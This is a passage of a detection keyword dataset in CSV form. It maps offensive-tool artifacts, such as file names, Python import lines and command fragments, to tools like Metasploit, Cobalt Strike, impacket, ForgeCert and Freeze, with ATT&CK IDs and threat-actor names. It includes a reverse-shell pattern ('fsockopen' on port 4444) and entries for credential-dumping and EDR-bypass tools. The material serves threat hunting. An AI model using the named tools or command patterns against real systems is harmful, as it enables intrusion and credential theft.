exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*forge_ticket_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ForgeCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ForgeCert-main*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"*forkatz.exe*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*forkatz.sln*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*forkatz.vcxproj*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*forkatz-main*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*-format=dotnet-createsection -sleep*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*--format-string ziiiiizzzb * ","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*--format-string ziiiiizzzib *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*fortalice/bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*fortra/impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FortyNorthSecurity*","offensive_tool_keyword","Github Username","FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. and more","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/FortyNorthSecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*FortyNorthSecurity/CIMplant*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*FortyNorthSecurity/FunctionalC2*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*found-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*FourEye(shellcode_bypass*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*FourEye-main*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*fox-it/adconnectdump*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*fox-it/BloodHound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*foxlox/hypobrychium*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" +"*fpc -c Seatbelt*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*FrameManagementAssociationRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementDeauthentication.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementProbeRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementReassociationResponse.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*framework/obfuscation/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*framework-114634acb84f8baa.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Framework-MobSF*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*frampton.py*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*freenas_reverse_root_shell_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Freeze_*_darwin_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*Freeze_*_linux_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*Freeze-rs -*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs_darwin_amd64*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs_linux_amd64*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs_windows_amd64.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*frida -l disableRoot.js -f owasp.mstg.uncrackable1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*frida-ps -U*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*frida-trace -x ntdll.dll -i * -p *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*frkngksl/NimExec*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*from .core import Fuzzer*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from .wfuzz import *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from bofhound import *","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*from bofhound.ad import*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*from burp import *","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*from burp import*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*from Exrop import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*from helpers.*_smbserver * import SimpleSMBServer*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*from holehe.core import*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*from merlin import *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*from pwn import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*from rarce import exploit*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*from shellcodes import *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*from wapitiCore.*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*frpc.exe -c frpc.in*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*fsockopen(*0.0.0.0*4444*exec(*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential 